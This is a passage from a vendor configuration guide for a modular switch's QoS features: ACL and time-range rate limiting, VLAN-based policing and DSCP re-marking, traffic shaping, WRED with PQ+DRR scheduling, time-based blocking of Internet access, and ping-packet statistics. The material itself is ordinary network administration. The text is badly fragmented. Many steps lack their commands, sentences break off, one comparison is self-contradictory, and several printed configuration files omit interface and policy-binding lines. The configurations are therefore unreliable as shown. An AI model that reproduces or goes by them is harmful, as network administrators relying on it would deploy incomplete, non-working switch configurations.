# Configure an ACL on the Switch to match traffic from network segment 192.168.2.0/24.
[Switch] acl 3000
Step 3 Configure a traffic classifier.
# Configure a traffic classifier on the Switch to classify packets based on the ACL.
[Switch] traffic classifier c1 operator and
# Configure a traffic behavior on the Switch to limit the rate of matched traffic.
[Switch-behavior-b1] car cir 2048 pir 4096 //Set the CIR to 2 Mbit/s and PIR to
4 Mbit/s.
# Create a traffic policy on the Switch, bind the traffic behavior and traffic classifier to the
traffic policy, and apply the traffic policy to the inbound direction of GE1/0/1 connected to
SwitchA.

Acl's step is 5

[Switch] display traffic policy user-defined p1
Policy: p1
Classifier: c1
Operator: AND
Behavior: b1
Permit
Committed Access Rate:
CIR 2048 (Kbps), PIR 4096 (Kbps), CBS 256000 (byte), PBS 512000 (byte)
Color Mode: color Blind
Conform Action: pass
Yellow Action: pass
Exceed Action: discard
----End

Configuration Files
l Configuration file of the Switch
#
sysname Switch
#
vlan batch 10 20 30
#
acl number 3000
#
traffic classifier c1 operator and precedence 5
if-match acl 3000
#
traffic behavior b1
permit
car cir 2048 pir 4096 cbs 256000 pbs 512000 mode color-blind green pass
yellow pass red discard
#
#
interface Vlanif10
ip address 192.168.1.1 255.255.255.0
#
interface Vlanif20
ip address 192.168.2.1 255.255.255.0
#
interface Vlanif30
ip address 10.1.20.2 255.255.255.0
#
#
#
ip route-static 0.0.0.0 0.0.0.0 10.1.20.1
#
return

#
sysname SwitchA
#
vlan batch 10 20
#
#
#
#
return
Video

Configure IP Subnet-based Rate Limiting
17.4 Example for Configuring Rate Limiting in a Specified

Time Range
Overview of the ACL Time Range
An ACL contains various matching conditions. You can configure a time range and reference
the time range in ACL rules on the device so that the device can match packets based on the
time range and the administrator can apply different policies to packets at different time
ranges.
In this example, a basic ACL defines a time range and the basic ACL is referenced by the
traffic policy module so that the device can limit the Internet access rate of employees in a
specified time range. This implements user bandwidth limiting based on the time range.
Configuration Notes

S12700 S12708 and S12712 V200R005C00, V200R006C00,

V200R007C00, V200R007C20,
V200R008C00, V200R009C00
S12704 V200R008C00, V200R009C00
NOTE
As shown in Figure 17-4, enterprise users connect to external network devices through
GE2/0/1 of the switch.
During work hours from 8:30 to 18:00, the Internet access rate of employees needs to be
limited within 4 Mbit/s.

Figure 17-4 Networking for configuring rate limiting in a specified time range
IP : 1 9 2 .1 6 8 .1 .1 0 /2 4
H o stA
IP : 1 9 2 .1 6 8 .1 .1 1 /2 4 G E 1 /0 /1 G E 2 /0 /1
In te rn e t
H o stB LSW S w itch R o u te r
IP : 1 9 2 .1 6 8 .1 .1 2 /2 4
E n te rp rise
ca m p u s n e tw o rk T ra ffic d ire ctio n
H o stC
The traffic policy based on the time range is used to implement rate limiting. The
1. Configure interfaces so that enterprise users can access the Internet through the Switch.
2. Configure a time range and reference the time range in an ACL.
3. Configure an ACL to match traffic passing the device in the specified time range.
4. Configure a traffic policy to limit the rate of packets matching ACL rules.
5. Apply the traffic policy to GE1/0/1 in the inbound direction.
Procedure
Step 1 Create a VLAN and configure interfaces.
# Create VLAN 10 on the Switch.

[Switch] vlan 10
# Configure GE1/0/1 and GE2/0/1 on the Switch as trunk interfaces and add them to VLAN
10.
NOTE
Configure the interface of the LSW connected to the Switch as a trunk interface and add it to VLAN 10.
# Create VLANIF 10 and set its IP address to 192.168.1.1/24.


NOTE
On the router, set the IP address of the interface connected to the Switch to 192.168.1.2/24, and
configure a sub-interface on the interface to terminating the VLAN.
Step 2 Create a periodic time range working_time that defines work hours from 8:30 to 18:00.
[Switch] time-range working_time 08:30 to 18:00 working-day //Define the work
hours.
Step 3 Configure ACL 2001 and define three rules to limit the bandwidth of packets from
192.168.1.10, 192.168.1.11, and 192.168.1.12 during work hours.
[Switch-acl-basic-2001] rule permit source 192.168.1.10 0 time-range
working_time //Limit the rate of packets from 192.168.1.10 at work hours.
Step 4 Reference ACL 2001 in a traffic classifier to classify packets.

[Switch] traffic classifier c1
Step 5 Configure a traffic behavior to set the rate limit to 4 Mbit/s.

[Switch-behavior-b1] car cir 4096 //Limit the Internet access rate to 4 Mbit/s
at work hours.
Step 6 Configure a traffic policy and apply the traffic policy to GE1/0/1 in the inbound direction.

[Switch] display traffic classifier user-defined c1
Classifier: c1
Precedence: 5
Operator: OR

Policy: p1
Classifier: c1
Operator: OR
Behavior: b1
Permit

Yellow Action: pass

----End
Configuration Files
#
sysname Switch
#
vlan batch 10
#
time-range working_time 08:30 to 18:00 working-day
#
acl number 2001
rule 5 permit source 192.168.1.10 0 time-range working_time
#
if-match acl 2001
#
traffic behavior b1
permit
car cir 4096 pir 4096 cbs 770048 pbs 1282048 mode color-blind green pass yellow
pass red discard
#
#
interface Vlanif10
ip address 192.168.1.1 255.255.255.0
#
#
#
return
17.5 Example for Configuring Rate Limiting Based on

VLAN IDs
Overview of a Traffic Classifier

In addition to an ACL, a traffic classifier in MQC defines many Layer 2 and Layer 3
matching rules such as the VLAN ID, 802.1p priority, DSCP priority, source MAC address,
and destination MAC address. You can configure different traffic classifiers on the device to
identify packets and configure actions such as rate limiting, statistics, or mirroring for these
packets.
In this example, traffic classifiers are configured based on VLAN IDs and different CIR
values are configured so that the device allocates different bandwidth to service flows.

Configuration Notes

S12700 S12708 and S12712 V200R005C00, V200R006C00,

V200R007C00, V200R007C20,
V200R008C00, V200R009C00
S12704 V200R008C00, V200R009C00
NOTE
As shown in Figure 17-5, the Switch connects to the router through GE2/0/1, and the
enterprise connects to the Internet through the Switch and router.
Voice, video, and data services are transmitted in VLAN 120, VLAN 110, and VLAN 100
respectively.
Traffic policing needs to be configured on the Switch to police packets of different services so
that traffic is limited within a proper range and bandwidth of each service is guaranteed.
Voice, video, and data services have QoS requirements in descending order of priority. The
Switch needs to re-mark DSCP priorities in different service packets so that the downstream
router processes them based on priorities, ensuring QoS of different services.
Table 17-6 describes the QoS requirements.
Table 17-6 QoS guarantee for uplink traffic on the Switch

Traffic Type CIR (kbit/s) PIR (kbit/s) DSCP Priority
Voice 2000 10000 46
Video 4000 10000 30
Data 4000 10000 14
Figure 17-5 Networking of traffic policing
Phone
VLAN 120
PC G E 1 /0 /1 G E 2 /0 /1
N e tw o rk
VLAN 100 LSW S w itch R o u te r
TV
E n te rp rise
ca m p u s n e tw o rk T ra ffic d ire ctio n
VLAN 110

1. Create a VLAN and configure interfaces so that the enterprise can access the Internet
through the Switch.
2. Configure traffic classifiers on the Switch to classify packets based on VLAN IDs.
3. Configure traffic behaviors on the Switch to limit the rate of packets and re-mark DSCP
priorities of packets.
4. Configure a traffic policy on the Switch, bind traffic behaviors and traffic classifiers, and
apply the traffic policy to the interface on the Switch connected to the LSW.
Procedure
Step 1 Create VLANs and configure interfaces.
# Create VLAN 100, VLAN 110, and VLAN 120 on the Switch.
# Configure GE1/0/1 and GE2/0/1 as trunk interfaces and add them to VLAN 100, VLAN
110, and VLAN 120.

# Configure traffic classifiers c1, c2, and c3 on the Switch to classify different service flows
from the enterprise based on VLAN IDs.
[Switch-classifier-c1] if-match vlan-id 120 //Configure a matching rule to match
packets with VLAN 120.

# Configure traffic behaviors b1, b2, and b3 on the Switch to police service flows and re-
mark priorities of the service flows, and configure traffic statistics.
[Switch-behavior-b1] car cir 2000 pir 10000 green pass //Set the CIR of packets
with VLAN 120 to 2000 kbit/s.
[Switch-behavior-b1] remark dscp 46 //Configure the device to re-mark DSCP

priorities of packets from VLAN 120 with 46.

[Switch-behavior-b1] statistic enable //Enable traffic statistics.
[Switch-behavior-b2] car cir 4000 pir 10000 green pass
[Switch-behavior-b2] remark dscp 30
[Switch-behavior-b2] statistic enable
[Switch-behavior-b3] car cir 4000 pir 10000 green pass
[Switch-behavior-b3] remark dscp 14
# Create a traffic policy p1 on the Switch, bind the traffic classifiers and traffic behaviors to
the traffic policy, and apply the traffic policy to GE1/0/1 in the inbound direction to police
packets from the enterprise and re-mark the packet priorities.

Classifier: c2
Precedence: 10
Operator: AND
Rule(s) : if-match vlan-id 110
Classifier: c3
Precedence: 15
Operator: AND
Classifier: c1
Precedence: 5
Operator: AND
# Check the configuration of the traffic policy p1.

Policy: p1
Classifier: c2
Operator: AND
Behavior: b2
Permit
Yellow Action: pass
Remark:
Remark DSCP af33

Statistic: enable
Classifier: c3
Operator: AND
Behavior: b3
Permit
Yellow Action: pass
Remark:
Remark DSCP af13
Statistic: enable
Classifier: c1
Operator: AND
Behavior: b1
Permit
Yellow Action: pass
Remark:
Remark DSCP ef
Statistic: enable
# Check information about the traffic policy that is applied to the interface. GE1/0/1 is used as
an example.
[Switch] display traffic policy statistics interface gigabitethernet 1/0/1 inbound
Traffic policy inbound: p1
Rule number: 3
Current status: success
Statistics interval: 300
---------------------------------------------------------------------
Board : 1
---------------------------------------------------------------------
Matched | Packets: 0
| Bytes: -
| Rate(pps): 0
| Rate(bps): -
---------------------------------------------------------------------
Passed | Packets: 0
| Bytes: -
| Rate(pps): 0
| Rate(bps): -
---------------------------------------------------------------------
Dropped | Packets: 0
| Bytes: -
| Rate(pps): 0
| Rate(bps): -
---------------------------------------------------------------------
Filter | Packets: 0
| Bytes: -
---------------------------------------------------------------------
Car | Packets: 0
| Bytes: -
---------------------------------------------------------------------
----End
Configuration Files

#
sysname Switch
#
#
#
traffic behavior b1
permit
pass red discard
remark dscp ef
statistic enable
traffic behavior b2
permit
pass red discard
remark dscp af33
statistic enable
traffic behavior b3
permit
pass red discard
remark dscp af13
statistic enable
#
#
#
#
return
Video
Configure VLAN-based Rate Limiting
17.6 Example for Configuring Traffic Shaping
Overview of Traffic Shaping

Traffic shaping adjusts the rate of outgoing traffic to ensure an even transmission rate. Traffic
shaping uses the buffer and token bucket to control traffic. When packets are sent at high
speed, traffic shaping caches packets in the buffer and then evenly sends these cached packets
based on the token bucket.
Traffic shaping is often configured on the downstream device to prevent packet loss caused by
congestion. For example, the headquarters connects to its branch through a leased line that has

finite bandwidth. Traffic policing is configured on the headquarters edge device to limit the
packet sending rate. In this situation, traffic shaping can be configured on the branch edge
device to cache excess packets, preventing packet loss.
Configuration Notes
S12700 S12708 and S12712 V200R005C00, V200R006C00,

V200R007C00, V200R007C20,
V200R008C00, V200R009C00
S12704 V200R008C00, V200R009C00
NOTE
As shown in Figure 17-6, the Switch is connected to the router through GE2/0/1. The 802.1p
priorities of voice, video, and data services are 6, 5, and 2, and these services can reach
residential users through the router and Switch. The transmission rate of traffic from the
enterprise campus network is higher than the transmission rate of traffic from the router;
therefore, jitter may occur on GE2/0/1. The requirements are as follows to prevent jitter and
ensure bandwidth of services:
l The CIR of the interface is 10000 kbit/s.

l The CIR and PIR for the voice service are 3000 kbit/s and 5000 kbit/s respectively.
l The CIR and PIR for the video service are 5000 kbit/s and 8000 kbit/s respectively.
l The CIR and PIR for the data service are 2000 kbit/s and 3000 kbit/s respectively.
Figure 17-6 Networking of traffic shaping
Phone
8021p=6
PC G E 1 /0 /1 G E 2 /0 /1
N e tw o r k
8021p=2 S w itc h A S w itc h R o u te r
TV
E n te r p r is e
c a m p u s n e tw o r k T r a ffic d ir e c tio n
8021p=5

1. Create VLANs and configure interfaces so that users can access the Internet through the
Switch.
2. Configure priority mapping to map 802.1p priorities of different service packets to
PHBs.
3. Configure traffic shaping on an interface to limit the total bandwidth of the interface.
4. Configure traffic shaping on queues of the interface to limit the bandwidth of voice,
video, and data services.
Procedure
Step 1 Create a VLAN and configure interfaces.
# Create VLAN 10.

# Configure GE1/0/1 and GE2/0/1 as trunk interfaces and add them to VLAN 10.
# Create VLANIF 10 and set its IP address to 10.10.10.2/24.

NOTE
On the router, set the IP address of the interface connected to the Switch to 10.10.10.1/24, and configure
a sub-interface on the interface to terminating the VLAN.
Step 2 Configure priority mapping.
# Create a DiffServ domain ds1 to map 802.1p priorities 6, 5, and 2 to PHBs CS7, EF, and
AF2 respectively.
[Switch] diffserv domain ds1
[Switch-dsdomain-ds1] 8021p-inbound 6 phb cs7 //Map 802.l priorities in
different service flows to PHBs so that the service flows enter different queues.
[Switch-dsdomain-ds1] 8021p-inbound 5 phb ef
[Switch-dsdomain-ds1] 8021p-inbound 2 phb af2
[Switch-dsdomain-ds1] quit
[Switch-GigabitEthernet1/0/1] trust upstream ds1
Step 3 Configure traffic shaping on an interface.
# Configure traffic shaping on an interface of the Switch to limit the CIR of the interface to
10000 kbit/s.


[Switch-GigabitEthernet2/0/1] qos lr cir 10000 outbound //Configure interface-
based rate limiting in the outbound direction to limit the total bandwidth.
Step 4 Configure traffic shaping on queues of the interface.

# Configure traffic shaping on queues of the interface on the Switch to set the CIR values of
voice, video, and data services to 3000 kbit/s, 5000 kbit/s, and 2000 kbit/s respectively and
their PIR values to 5000 kbit/s, 8000 kbit/s, and 3000 kbit/s respectively.
[Switch-GigabitEthernet2/0/1] qos queue 7 shaping cir 3000 pir 5000 //Set the
bandwidth of voice packets entering queue 7 to 3000 kbit/s according to the
default mapping between PHBs and local priorities.
[Switch-GigabitEthernet2/0/1] qos queue 5 shaping cir 5000 pir 8000
[Switch-GigabitEthernet2/0/1] qos queue 2 shaping cir 2000 pir 3000
[Switch] quit

# Check the configuration of the DiffServ domain ds1.
<Switch> display diffserv domain name ds1
diffserv domain name:ds1
8021p-inbound 0 phb be green
8021p-inbound 1 phb af1 green
8021p-inbound 5 phb ef green
8021p-inbound 6 phb cs7 green
8021p-outbound be green map 0
......
# After the configuration is complete, the CIR of packets sent from GE2/0/1 is 10000 kbit/s;
the CIR of the voice service packets is 3000 kbit/s and PIR is 5000 kbit/s; the CIR of the
video service packets is 5000 kbit/s and the PIR is 8000 kbit/s; the CIR of the data service
packets is 2000 kbit/s and the PIR is 3000 kbit/s.
----End
Configuration Files
#
sysname Switch
#
vlan batch 10
#
diffserv domain ds1
#
interface Vlanif10
ip address 10.10.10.2 255.255.255.0
#
trust upstream ds1
#
qos lr cir 10000 cbs 1250000 outbound
qos queue 2 shaping cir 2000 pir 3000


#
return
17.7 Example for Configuring Congestion Avoidance and

Congestion Management
Overview of Congestion Management and Congestion Avoidance

Congestion management implements queuing and scheduling when sending packet flows.
Based on the queuing and scheduling policies, the device provides the following congestion
management technologies: Priority Queuing (PQ), Deficit Round Robin (DRR), Weighted
Round Robin (WRR), PQ+DRR, and PQ+WRR. On the device, there are eight queues on
each interface in the outbound direction, which are identified by index numbers. The index
numbers range from 0 to 7. Based on the mappings between local priorities and queues, the
device sends the classified packets to queues, and then schedules the packets using queue
scheduling mechanisms.
Congestion avoidance is a flow control mechanism. A system configured with congestion

avoidance monitors network resource usage such as queues and memory buffers. When
congestion occurs or aggravates, the system discards packets. Congestion avoidance uses tail
drop and random drop policies to discard packets. Random drop policies include the Simple
Random Early Detection (SRED) and Weighted Random Early Detection (WRED).
This example uses PQ+DRR scheduling to implement congestion management. In WRR

scheduling, the number of times packets are scheduled in each queue is in direct ratio to the
weight of this queue. A higher weight indicates more times packets are scheduled. WRR
schedules packets based on the number of packets. That is, large-sized packets are more likely
to be scheduled and obtain more bandwidth. DRR schedules packets considering the packet
length, ensuring that packets are scheduled with the same chance. WRED is configured to
implement congestion avoidance. The device discards excess traffic according to the
maximum drop probability.
Configuration Notes
S12700 S12708 and S12712 V200R005C00, V200R006C00,

V200R007C00, V200R007C20,
V200R008C00, V200R009C00
S12704 V200R008C00, V200R009C00
NOTE

As shown in Figure 17-7, the Switch is connected to the router through GE2/0/1. The 802.1p
priorities of voice, video, and data services from the Internet are 6, 5, and 2, and these
services can reach residential users through the router and Switch. On the Switch, the rate of
GE2/0/1 (inbound interface) is higher than the rates of GE1/0/1 and GE1/0/2 (outbound
interfaces), so congestion may occur on the two outbound interfaces.
To reduce the impact of network congestion and ensure bandwidth for high-priority and
delay-sensitive services, set parameters according to Table 17-9 and Table 17-10.
Table 17-9 Congestion avoidance parameters

Service Type Color Lower Drop Upper Drop Maximum
Threshold (%) Threshold (%) Drop
Probability
Voice Green 80 100 10
Video Yellow 60 80 20
Data Red 40 60 40
Table 17-10 Congestion management parameters

Service Type CoS Value DRR
Voice EF 0
Video AF3 100
Data AF1 50
Figure 17-7 Networking of congestion avoidance and congestion management
In te rn e t
R o u te r
G E 2 /0 /1
G E 1 /0 /1 G E 1 /0 /2
S w itc h
PC TV
8 0 2 .1 p = 2 LSW LSW 8 0 2 .1 p = 5
8 0 2 .1 p = 5 8 0 2 .1 p = 6 8 0 2 .1 p = 2 8 0 2 .1 p = 6
TV Phone PC Phone

1. Configure a VLAN for each interface so that devices can communicate with each other
at the link layer.
2. Create a DiffServ domain on the Switch to map 802.1p priorities of different service
packets to PHBs and colors, and bind the DiffServ domain to the inbound interface of the
Switch.
3. Configure a WRED profile on the Switch and apply the WRED profile to the outbound
interfaces.
4. Set scheduling parameters of each queue on the outbound interface of the Switch.
Procedure
Step 1 Configure a VLAN for each interface so that devices can communicate with each other at the
link layer.
# Create a DiffServ domain ds1 to map 802.1p priorities 6, 5, 2 to PHBs of EF, AF3, and AF1
and colors of green, yellow, and red respectively.
[Switch-dsdomain-ds1] 8021p-inbound 6 phb ef green //Create a DiffServ domain to
map 802.1p priorities of different service packets to PHBs so that packets enter
different queues.
[Switch-dsdomain-ds1] 8021p-inbound 5 phb af3 yellow
[Switch-dsdomain-ds1] 8021p-inbound 2 phb af1 red
# Bind the DiffServ domain to GE2/0/1 of the Switch.

[Switch-GigabitEthernet2/0/1] trust upstream ds1 //Apply the DiffServ domain to
the interface.
[Switch-GigabitEthernet2/0/1] trust 8021p inner //Configure the interface to
trust 802.1p priorities.
Step 3 Configure congestion avoidance.
# Create a WRED profile wred1 on the Switch and set scheduling parameters in the WRED
profile.

[Switch] drop-profile wred1

[Switch-drop-wred1] color green low-limit 80 high-limit 100 discard-percentage
10 //Configure a WRED drop profile, and set the upper and lower drop threshold
and maximum drop probability for green packets.
[Switch-drop-wred1] color yellow low-limit 60 high-limit 80 discard-percentage
20 //When the percentage of the yellow packet length to the queue length reaches
60%, the device starts to discard packets with the maximum drop probability of
20%. When the percentage of the yellow packet length to the queue length reaches
80%, the device discards all new packets.
[Switch-drop-wred1] color red low-limit 40 high-limit 60 discard-percentage 40
[Switch-drop-wred1] quit
# Apply the WRED profile wred1 to GE1/0/1 and GE1/0/2 on the Switch.
[Switch-GigabitEthernet1/0/1] qos wred wred1
[Switch-GigabitEthernet1/0/1] qos queue 5 wred wred1
[Switch-GigabitEthernet1/0/2] qos wred wred1
Step 4 Configure congestion management.

# Set scheduling parameters of each queue on GE1/0/1 and GE1/0/2 of the Switch.
[Switch-GigabitEthernet1/0/1] qos pq 5 //Configure PQ scheduling for queueu 5.
[Switch-GigabitEthernet1/0/1] qos drr 0 to 4 //Configure DRR scheduling for
queues 0 to 4.
[Switch-GigabitEthernet1/0/1] qos queue 3 drr weight 100 //Set the DRR weight of
queue 3 to 100.
[Switch-GigabitEthernet1/0/1] qos queue 1 drr weight 50 //Set the DRR weight of
queue 1 to 50. The device schedules packets in queue 1 and queue 3 according to
the ratio of 1:2.
[Switch-GigabitEthernet1/0/2] qos pq 5
[Switch-GigabitEthernet1/0/2] qos drr 0 to 4
[Switch-GigabitEthernet1/0/2] qos queue 3 drr weight 100
[Switch-GigabitEthernet1/0/2] qos queue 1 drr weight 50

# Check the configuration of the DiffServ domain ds1.
[Switch] display diffserv domain name ds1
diffserv domain name:ds1
8021p-inbound 0 phb be green
8021p-inbound 2 phb af1 red
8021p-inbound 5 phb af3 yellow
8021p-outbound be green map 0
......
# Check the WRED profile configuration.

[Switch] display drop-profile name wred1
Drop-profile[1]: wred1
Queue depth : default

Color Low-limit High-limit Discard-percentage

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Green 80 100 10
Yellow 60 80 20
Red 40 60 40
Non-tcp 100 100 100
-----------------------------------------------------------------
----End
Configuration Files
#
sysname Switch
#
vlan batch 2 5 to 6
#
diffserv domain ds1
#
drop-profile wred1
color green low-limit 80 high-limit 100 discard-percentage 10
color yellow low-limit 60 high-limit 80 discard-percentage 20
color red low-limit 40 high-limit 60 discard-percentage 40
#
qos wred wred1
qos pq 5 to 7 drr 0 to 4
qos queue 1 drr weight 50
qos queue 1 wred wred1
#
qos wred wred1
qos pq 5 to 7 drr 0 to 4
#
trust upstream ds1
trust 8021p inner
#
return

17.8 Example for Configuring a Traffic Policy to Prevent

Some Users from Accessing the Internet at the Specified
Time
Overview
Modular QoS Command-Line Interface (MQC) allows the device to classify traffic of a
certain type so that the device can provide the same service for packets of the same type and
differentiated services for packets of different types. Filtering specified type of packets can be
only implemented through MQC.
When packets of a type are considered untrusted, MQC can be used to differentiate the
packets from other types of packets and discard them. When packets of a type are considered
trusted, MQC can be used to differentiate the packets from other types of packets and permit
them to pass through.
Compared with the blacklist, MQC-based packet filtering classifies packets in a more fine-
grained manner and is more flexible to deploy.
Configuration Notes
NOTE

Product Model Software Version
S12700 V200R005C00 and later versions
VLAN 20, respectively. Servers are deployed in VLAN 10 to provide services for internal and
external users, and office services of employees are transmitted in VLAN 20. The company
requires that employees in VLAN 20 access only servers in VLAN 10 during the working
time (8:00 to 18:00).
Figure 17-8 Preventing employees from accessing the Internet at the specified time
R o u te rA
1 0 .1 .2 0 .1 /2 4
VLAN 10
1 9 2 .1 6 8 .1 .0 /2 4 G E 1 /0 /1 G E 1 /0 /2
G E 0 /0 /3 N e tw o rk
G E 1 /0 /1
VLAN 20 S w itch A S w itch G E 1 /0 /3
1 9 2 .1 6 8 .2 .0 /2 4 G E 1 /0 /2
R o u te rB
1 0 .1 .3 0 .1 /2 4


Interface
SwitchA GigabitEthernet VLAN 10 - 192.168.1.1/24

1/0/1
GigabitEthernet VLAN 20 - 192.168.2.1/24

1/0/2
GigabitEthernet VLAN 10 and - 192.168.3.1/24

1/0/3 VLAN 20

1/0/1 VLAN 20 and VLANIF 192.168.1.1/24
20 VLANIF 20:
192.168.2.1/24

1/0/2

1/0/3
2. On the Switch, configure a time range 8:00-18:00 from Monday to Friday so that the
device can control traffic based on the time range.
3. On the Switch, configure an ACL to match the traffic when employees in VLAN 20
access servers in VLAN 10 based on the time range,
5. Configure a traffic behavior on the Switch to permit matched traffic to pass through.
and traffic behavior, and apply the traffic policy to the inbound direction of GE1/0/1
connected to SwitchA so that employees in VLAN 20 cannot access the Internet during
the working time and can access the Internet during the non-working time.
Procedure
[Switch] vlan batch 10 20 30 40 //Create VLAN 10 to VLAN 40.
interface to trunk.


30.
segment 192.168.1.0/24.
for the VLANIF interface to connect to RouterA.
to the external network to implement interworking, and configure load balancing.
10.
interface to trunk.

Configure the IP address of 10.1.20.1/24 for the interface of RouterA connected to the switch.
Configure the IP address of 10.1.30.1/24 for the interface of RouterB connected to the switch.
# Configure a time range 8:00-18:00 from Monday to Friday on the Switch.
[Switch] time-range worktime 8:00 to 18:00 working-day

# Configure an ACL on the Switch and define rules permit and reject traffic.

[Switch] acl 3000

192.168.1.0 0.0.0.255 time-range worktime //Configure an ACL rule to permit
users in VLAN 20 to access servers in VLAN 10 during the working time.
[Switch-acl-adv-3000] rule deny ip source 192.168.2.0 0.0.0.255 time-range
worktime //Configure an ACL rule to prevent users in VLAN 20 from accessing the
public network during the working time.


# Configure a traffic behavior on the Switch and define the permit action.
SwitchA.

Acl's step is 5
time-range worktime (match-counter 0)(Active)
rule 10 deny ip source 192.168.2.0 0.0.0.255 time-range worktime (match-counter
0)(Active)
NOTE
If the time of the device is within the defined time range, the time range in the ACL rule is displayed as
Active; otherwise, the time range in the ACL rule is displayed as Inactive.

Policy: p1
Classifier: c1
Operator: AND
Behavior: b1
Permit
# Employees in VLAN 20 cannot access the public network during the working time, and can
access servers in VLAN 10.
----End

Configuration Files
#
sysname Switch
#
vlan batch 10 20 30 40
#
time-range worktime 08:00 to 18:00 working-day
#
acl number 3000
0.0.0.255 time-range worktime
rule 10 deny ip source 192.168.2.0 0.0.0.255 time-range worktime
#
if-match acl 3000
#
traffic behavior b1
permit
#
#
interface Vlanif10
ip address 192.168.1.1 255.255.255.0
#
interface Vlanif20
ip address 192.168.2.1 255.255.255.0
#
interface Vlanif30
ip address 10.1.20.2 255.255.255.0
#
interface Vlanif40
ip address 10.1.30.2 255.255.255.0
#
#
#
#
ip route-static 0.0.0.0 0.0.0.0 10.1.20.1
ip route-static 0.0.0.0 0.0.0.0 10.1.30.1
#
return

#
sysname SwitchA
#
vlan batch 10 20
#
#
#


#
return
17.9 Example for Configuring a Traffic Policy to Collect

Statistics on Ping Packets
Overview
During network fault rectification, devices may fail to ping each other. You can configure the
device to collect statistics on ping packets to narrow the search scope and locate fault points
rapidly.
Ping packets are ICMP packets, so you can define ICMP in an advanced ACL to match ping
packets. When a traffic policy is used to collect statistics on ping packets, an ACL is used to
classify packets and the traffic statistics action is defined for matched packets. The statistics
results helps locate faults.
l If the numbers of received and forwarded ping packets on a device are the same, ping
packets are forwarded normally and no packet loss occurs. If the number of received
ping packets is larger than the number of forwarded ping packets, packet loss occurs on
the device.
l If the number of received ping packets is equal to the number of received ping packets
on an interface, ping packets are forwarded normally and no packet loss occurs on the
link of the interface. If the number of sent ping packets is larger than the number of
received ping packets on the interface, packet loss occurs on the link of the interface. In
this case, the remote device needs to be configured to collect packet statistics for fault
location.
Configuration Notes

S12700 S12708 and S12712 V200R005C00, V200R006C00,

V200R007C00, V200R007C20,
V200R008C00, V200R009C00
S12704 V200R008C00, V200R009C00
NOTE
As shown in Figure 17-9, the PC cannot access the server. The device where data flows pass
needs to be configured to collect statistics on ping packets so that the fault point can be
located.

Figure 17-9 Configuring a traffic policy to collect statistics on ping packets
GE1/0/1 GE1/0/2
VLAN 10 VLAN 10
PC Switch Router Server

VLAN 10 10.1.2.10/24
10.1.1.1/24
1. Create VLANs and configure interfaces to ensure network connectivity.
2. Configure ACLs to match ICMP packets exchanged between the PC and server.
3. Configure traffic classifiers to classify packets based on the ACLs.
4. Configure traffic behaviors and define the traffic statistics action.
5. Configure traffic policies, bind the traffic classifiers and traffic behaviors to the traffic
policies, and apply the traffic policies to inbound and outbound directions of GE1/0/1
and GE1/0/2 of the Switch.
Procedure
# Configure the Switch.
[Switch] vlan 10 //Create VLAN 10.
10.
# Configure the PC's gateway address 10.1.1.2/24 for the interface of the router connected to
the Switch, and configure the IP address 10.1.2.1/24 for the interface of the router connected
to the server.
# Configure ACL rules on the Switch to match ICMP packets exchanged between the PC and
server.
[Switch] acl 3001
[Switch-acl-adv-3001] rule permit icmp source 10.1.1.1 0 destination 10.1.2.10
0 //Configure an ACL rule to permit packets from the PC to the server.
[Switch] acl 3002

[Switch-acl-adv-3002] rule permit icmp source 10.1.2.10 0 destination 10.1.1.1

0 //Configure an ACL rule to permit packets from the server to the PC.

# Configure traffic classifiers on the Switch to classify packets based on the ACL.

# Configure traffic behaviors on the Switch and define the traffic statistics action in the traffic
behaviors.
Step 5 Configure traffic policies and apply the traffic policies to interfaces.
# Create traffic policies p1 and p2 on the Switch, bind the traffic behaviors and traffic
classifiers to the traffic policies, apply the traffic policy p1 to the inbound direction of
GE1/0/1 and outbound direction of GE1/0/2, and apply the traffic policy p2 to the outbound
direction of GE1/0/1 and inbound direction of GE1/0/2.
[Switch-GigabitEthernet1/0/1] traffic-policy p2 outbound
[Switch-GigabitEthernet1/0/2] traffic-policy p1 outbound

# Check the ACL configuration on the Switch.

Acl's step is 5
rule 5 permit icmp source 10.1.1.1 0 destination 10.1.2.10 0 (match-counter 0)

Acl's step is 5
rule 5 permit icmp source 10.1.2.10 0 destination 10.1.1.1 0 (match-counter 0)
# Check the traffic policy configuration on the Switch.


Policy: p2
Classifier: c2
Operator: AND
Behavior: b2
Permit
Statistic: enable
Policy: p1
Classifier: c1
Operator: AND
Behavior: b1
Permit
Statistic: enable
# Ping the server from the PC and check the traffic statistics in the inbound and outbound
directions of GE1/0/1 and GE1/0/2 on the Switch. Here, check the traffic statistics in the
inbound direction of GE1/0/1.
Rule number: 1
Current status: success
---------------------------------------------------------------------
Board : 1
---------------------------------------------------------------------
| Bytes: 0
| Rate(pps): 0
| Rate(bps): 0
---------------------------------------------------------------------
Passed | Packets: 0
| Bytes: 0
| Rate(pps): 0
| Rate(bps): 0
---------------------------------------------------------------------
| Bytes: 0
| Rate(pps): 0
| Rate(bps): 0
---------------------------------------------------------------------
Filter | Packets: 0
| Bytes: 0
---------------------------------------------------------------------
Car | Packets: 0
| Bytes: 0
---------------------------------------------------------------------
Matched indicates the numbers of packets and bytes matching the traffic classifier, and
Passed indicates the numbers of forwarded packets and bytes matching the traffic classifier.
The following table describes the traffic statistics.

Traffic Statistics on Traffic Statistics on Description

GigabitEthernet1/0/1 GigabitEthernet1/0/2
display traffic policy display traffic policy l If the statistics are 0,

statistics interface statistics interface ping request packets do
gigabitethernet 1/0/1 gigabitethernet 1/0/2 not reach the Switch.
inbound outbound l If the statistics are
consistent and are not 0,
ping request packets are
forwarded normally.
l If the statistics in the
inbound direction of
GigabitEthernet1/0/1 are
more than the statistics in
the outbound direction of
GigabitEthernet1/0/2,
ping request packets are
discarded on the Switch
and the Switch is the
fault point.
display traffic policy display traffic policy l If the statistics are 0,

statistics interface statistics interface ping response packets do
gigabitethernet 1/0/1 gigabitethernet 1/0/2 not reach the Switch.
outbound inbound l If the statistics are
consistent and are not 0,
ping response packets
are forwarded normally.
the outbound direction of
are discarded on the
Switch and the Switch is
the fault point.

Traffic Statistics on Traffic Statistics on Description

GigabitEthernet1/0/1 GigabitEthernet1/0/2
display traffic policy display traffic policy l If the statistics are

statistics interface statistics interface consistent and are not 0,
gigabitethernet 1/0/1 gigabitethernet 1/0/2 ping packets are
inbound inbound forwarded normally.
the inbound direction of
are discarded on the
uplink network of the
Switch. The fault needs
to be further located.
----End
Configuration Files
#
sysname Switch
#
vlan batch 10
#
acl number 3001
rule 5 permit icmp source 10.1.1.1 0 destination 10.1.2.10 0
acl number 3002
